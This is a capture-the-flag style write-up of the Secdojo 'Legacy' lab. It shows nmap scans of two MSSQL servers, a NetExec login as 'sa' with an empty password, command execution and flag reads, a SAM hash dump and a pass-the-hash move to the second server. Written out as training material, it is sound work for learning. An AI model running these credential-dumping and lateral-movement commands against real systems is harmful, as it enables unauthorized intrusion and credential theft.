Post

Legacy: an Easy MSSQL lab from secdojo

Posted Updated
Legacy Secdojo
Legacy Secdojo
By plur1bu5
8 min read
Legacy: an Easy MSSQL lab from secdojo
Easy Secdojo

Overview

The IT Team was tasked to plan a database upgrade for a critical application. The application being very old, the DBA has kept the authorization layer unchanged.

Reconnaissance

Note: This writeup moves quickly through reconnaissance. For a detailed breakdown of the recon methodology, see the Cascade writeup.

Network Stack

okay this time we’re dealing with 2 database servers, we run the basic nmap scans though database we know we’ll be dealing with mssql most likely:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2012 11.00.2100.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2026-03-31T00:36:47
| Not valid after:  2056-03-31T00:36:47
| MD5:     eca3 f381 517f e2d3 0e83 75f7 6e24 7914
| SHA-1:   0a14 4791 c16f b9f3 b1d9 68f3 01eb a90d f198 3684
|_SHA-256: b98d cc07 6f30 25d6 5f24 3310 7796 3eb5 d030 e491 6026 ac84 7163 bac1 b932 0a9d
| ms-sql-info:
|   10.8.0.100:1433:
|     Version:
|       name: Microsoft SQL Server 2012 RTM
|       number: 11.00.2100.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-03-31T00:41:31+00:00; +1s from scanner time.
| ms-sql-ntlm-info:
|   10.8.0.100:1433:
|     Target_Name: SQLSERVER
|     NetBIOS_Domain_Name: SQLSERVER
|     NetBIOS_Computer_Name: SQLSERVER
|     DNS_Domain_Name: SQLSERVER
|     DNS_Computer_Name: SQLSERVER
|_    Product_Version: 6.3.9600
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-30T00:36:52
| Not valid after:  2026-09-29T00:36:52
| MD5:     49ce f5b0 3af7 ba8e 4eb5 6f09 2024 5bcc
| SHA-1:   305c 6e1e d685 6dee fdb7 0982 039f c40b 83eb 4555
|_SHA-256: 1fed 325d 2dce df86 e02d aa2d 040f b14f a618 c1a1 fc12 3490 7752 6eeb 7242 c1c3
|_ssl-date: 2026-03-31T00:41:31+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: SQLSERVER
|   NetBIOS_Domain_Name: SQLSERVER
|   NetBIOS_Computer_Name: SQLSERVER
|   DNS_Domain_Name: SQLSERVER
|   DNS_Computer_Name: SQLSERVER
|   Product_Version: 6.3.9600
|_  System_Time: 2026-03-31T00:41:25+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/wsmans?
| ssl-cert: Subject: commonName=SQLSERVER
| Subject Alternative Name: DNS:SQLSERVER, DNS:SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-15T03:33:38
| Not valid after:  2023-04-15T03:33:38
| MD5:     e809 b79f 057a f00f dc18 ccf7 b9c1 267c
| SHA-1:   af99 d750 759c a5a3 0ae5 785b 80c7 c5bd 2de0 9a82
|_SHA-256: f6ac 90ce 36cf 9aef f641 7c92 9f3c 5522 6819 170f fd94 b109 baf8 5546 79c9 8798
|_ssl-date: 2026-03-31T00:41:31+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49163/tcp open  msrpc         Microsoft Windows RPC

and the second :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2012 11.00.2100.00; RTM
| ms-sql-ntlm-info:
|   10.8.0.101:1433:
|     Target_Name: SQLSERVER
|     NetBIOS_Domain_Name: SQLSERVER
|     NetBIOS_Computer_Name: SQLSERVER
|     DNS_Domain_Name: SQLSERVER
|     DNS_Computer_Name: SQLSERVER
|_    Product_Version: 6.3.9600
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2026-03-31T00:37:22
| Not valid after:  2056-03-31T00:37:22
| MD5:     a889 b273 c287 7f21 77b0 07b2 d381 6286
| SHA-1:   dee0 fcf6 91f7 55a4 bc7f 2934 ff46 4939 8208 610e
|_SHA-256: 53b6 5ccf a3da 073c 1b02 0f79 53e8 b9db 9bfb a8a6 ca73 5b54 8000 f5b3 406d 0528
| ms-sql-info:
|   10.8.0.101:1433:
|     Version:
|       name: Microsoft SQL Server 2012 RTM
|       number: 11.00.2100.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-03-31T00:41:37+00:00; +1s from scanner time.
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-30T00:37:27
| Not valid after:  2026-09-29T00:37:27
| MD5:     bcb2 7725 edfa 01ae 6c41 5fd3 2584 7478
| SHA-1:   049c 435d 356a 8098 7b34 370a 02a8 6c0b 66c3 2cea
|_SHA-256: 3753 918c d89b d810 baf6 24f8 8205 1b68 1ea8 e16a 2490 7cb7 f886 9ee6 99e3 292c
|_ssl-date: 2026-03-31T00:41:37+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: SQLSERVER
|   NetBIOS_Domain_Name: SQLSERVER
|   NetBIOS_Computer_Name: SQLSERVER
|   DNS_Domain_Name: SQLSERVER
|   DNS_Computer_Name: SQLSERVER
|   Product_Version: 6.3.9600
|_  System_Time: 2026-03-31T00:41:31+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp  open  ssl/wsmans?
| ssl-cert: Subject: commonName=SQLSERVER
| Subject Alternative Name: DNS:SQLSERVER, DNS:SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-15T03:33:38
| Not valid after:  2023-04-15T03:33:38
| MD5:     e809 b79f 057a f00f dc18 ccf7 b9c1 267c
| SHA-1:   af99 d750 759c a5a3 0ae5 785b 80c7 c5bd 2de0 9a82
|_SHA-256: f6ac 90ce 36cf 9aef f641 7c92 9f3c 5522 6819 170f fd94 b109 baf8 5546 79c9 8798
|_ssl-date: 2026-03-31T00:41:37+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49163/tcp open  msrpc         Microsoft Windows RPC
Device type: general purpose

so just mssql as predected and bunch of msrpc standard in windows.

Exploitation

the description says ‘The application being very old, the DBA has kept the authorization layer unchanged’ , one thing to test for here is default passwords or weak ones :

1
2
3
4

┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth
MSSQL       10.8.0.100      1433   SQLSERVER        [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL       10.8.0.100      1433   SQLSERVER        [+] SQLSERVER\sa: (Pwn3d!)

It worked. The Pwn3d! response means xp_cmdshell is available or can be enabled, giving OS-level command execution as the SQL service account. Also notable is EncryptionReq:False, meaning credentials are transmitted in cleartext on the wire. The build number 9600 is shared between Windows 8.1 and Server 2012 R2 — given the server context it’s almost certainly the latter, a version potentially vulnerable to MS17-010 or MS15-011 if unpatched. That said, with sa access we already have a direct path in.

1
2
3
4
5
6
7
8
9
10
11
12
13

┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth -x 'whoami'
MSSQL       10.8.0.100      1433   SQLSERVER        [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL       10.8.0.100      1433   SQLSERVER        [+] SQLSERVER\sa: (Pwn3d!)
MSSQL       10.8.0.100      1433   SQLSERVER        [+] Executed command via mssqlexec
MSSQL       10.8.0.100      1433   SQLSERVER        nt authority\system

┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth -x 'type C:\Users\Administrator\Desktop\proof.txt'
MSSQL       10.8.0.100      1433   SQLSERVER        [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL       10.8.0.100      1433   SQLSERVER        [+] SQLSERVER\sa: (Pwn3d!)
MSSQL       10.8.0.100      1433   SQLSERVER        [+] Executed command via mssqlexec
MSSQL       10.8.0.100      1433   SQLSERVER        flag_88c760b6_e378_46a4_9187_9ad206d94d8b

the application runs as system, so we were able to retrieved the first flag.

Privilege Escalation

1
2
3
4
5
6
7

┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth --sam
MSSQL       10.8.0.100      1433   SQLSERVER        [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL       10.8.0.100      1433   SQLSERVER        [+] SQLSERVER\sa: (Pwn3d!)
MSSQL       10.8.0.100      1433   SQLSERVER        [*] Dumping SAM hashes
MSSQL       10.8.0.100      1433   SQLSERVER        Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8906a1410a19022a43390ac35290d6f:::
MSSQL       10.8.0.100      1433   SQLSERVER        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

well, since this is an old enviroment, there is a high chance the person who set up the first database did so for the second one, thus password reuse is to be expected, let’s check :

1
2
3
4
5
6
7
8
9
10
11

┌──(kali㉿kali)-[/tmp/a]
└─$ nxc smb 10.8.0.101 -u administrator -H b8906a1410a19022a43390ac35290d6f
SMB         10.8.0.101      445    SQLSERVER        [*] Windows Server 2012 R2 Standard 9600 x64 (name:SQLSERVER) (domain:SQLSERVER) (signing:False) (SMBv1:True)
SMB         10.8.0.101      445    SQLSERVER        [+] SQLSERVER\administrator:b8906a1410a19022a43390ac35290d6f (Pwn3d!)

┌──(kali㉿kali)-[/tmp/a]
└─$ nxc smb 10.8.0.101 -u administrator -H b8906a1410a19022a43390ac35290d6f -x 'type C:\Users\Administrator\Desktop\proof.txt'
SMB         10.8.0.101      445    SQLSERVER        [*] Windows Server 2012 R2 Standard 9600 x64 (name:SQLSERVER) (domain:SQLSERVER) (signing:False) (SMBv1:True)
SMB         10.8.0.101      445    SQLSERVER        [+] SQLSERVER\administrator:b8906a1410a19022a43390ac35290d6f (Pwn3d!)
SMB         10.8.0.101      445    SQLSERVER        [+] Executed command via wmiexec
SMB         10.8.0.101      445    SQLSERVER        flag_1c037aa4_e58b_416b_9c64_6b8857f74c7e

and we got the 2nd flag.

Offensive Security
secdojo windows mssql default-credentials password-reuse
This post is licensed under CC BY 4.0 by the author.